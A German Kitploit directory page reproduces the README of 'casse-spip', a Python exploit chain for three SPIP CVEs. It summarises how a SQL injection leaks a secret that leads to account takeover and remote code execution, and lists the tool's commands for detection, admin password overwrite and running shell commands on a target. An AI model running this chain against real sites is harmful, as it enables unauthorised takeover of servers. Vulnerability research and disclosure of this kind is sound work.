Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
spip-exploits — Python-Exploit-Kette für SPIP CVEs 2026-72708/72709/72710, die unauthentifizierte SQL-Injection mit Account-Übernahme und Remote-Code-Ausführung verkettet. | Kitploit
Tools/GitHubGitHub/ambionics/spip-exploits
Exploit-FrameworksSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsPapers & Forschung
GitHubambionics/spip-exploits

spip-exploits

Python-Exploit-Kette für SPIP CVEs 2026-72708/72709/72710, die unauthentifizierte SQL-Injection mit Account-Übernahme und Remote-Code-Ausführung verkettet.

Repository anzeigen
1vor 1 TagNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Casse-Spip (CVE-2026-72708, CVE-2026-72709, CVE-2026-72710)

Von einer nicht authentifizierten SQL-Injection zur Remote-Code-Ausführung

Exploit für CVE-2026-72708, CVE-2026-72709 und CVE-2026-72710, entdeckt von Franck Chevalier (Wayko)

Für einen vollständigen technischen Deep Dive lesen Sie den vollständigen Artikel im Lexfo-Blog.

Haftungsausschluss

Dieses Repository wird ausschließlich für Forschungs- und defensive Sicherheitszwecke bereitgestellt. Der Autor übernimmt keine Verantwortung für den Missbrauch dieser Informationen.


Überblick

Der Einstiegspunkt ist eine SQL-Injection in der öffentlichen sitemap.xml-Seite, um alea_ephemere auszuleaken.

Mit diesem Secret können gültige Nonces für anonyme Aktionen gefälscht werden.

Zwei Aktionen führen von dort aus zu RCE:

  • action=editer_auteur Account-Übernahme, dann RCE aus dem privaten Bereich.
  • action=editer_objet Mass Assignment, um eine Zeile in die spip_jobs-Warteschlange zu schreiben und sie dann über action=cron auszuführen.

Ausnutzung

Einrichtung

root@kitploit:~
python3 -m venv .venv
.venv/bin/pip install -r requirements.txt
.venv/bin/python3 casse-spip.py --help

Erkennung

root@kitploit:~
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000

Vollständige Kette 1 : Account-Übernahme (CVE-2026-72708 > CVE-2026-72709)

root@kitploit:~
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --ato -i 1 -p "Casse-Spip!2026"

Vor dem Überschreiben gibt --ato den login und den aktuellen pass-Hash des Ziels aus (über die SQLi), sodass Sie ihn anschließend mit --restore-hash wiederherstellen können:

root@kitploit:~
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --restore-hash '$2y$12$...' -i 1

Vollständige Kette 2 : RCE (CVE-2026-72708 > CVE-2026-72709 > CVE-2026-72710)

root@kitploit:~
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --exploit -c "id"

Die Datei wird nach IMG/casse-spip_<token>.html geschrieben.


Referenzen

  • Blogbeitrag - Technischer Deep Dive
  • Vulncheck - Details zur Schwachstelle
  • CVE-2026-72708
  • CVE-2026-72709
  • CVE-2026-72710
Tool herunterladen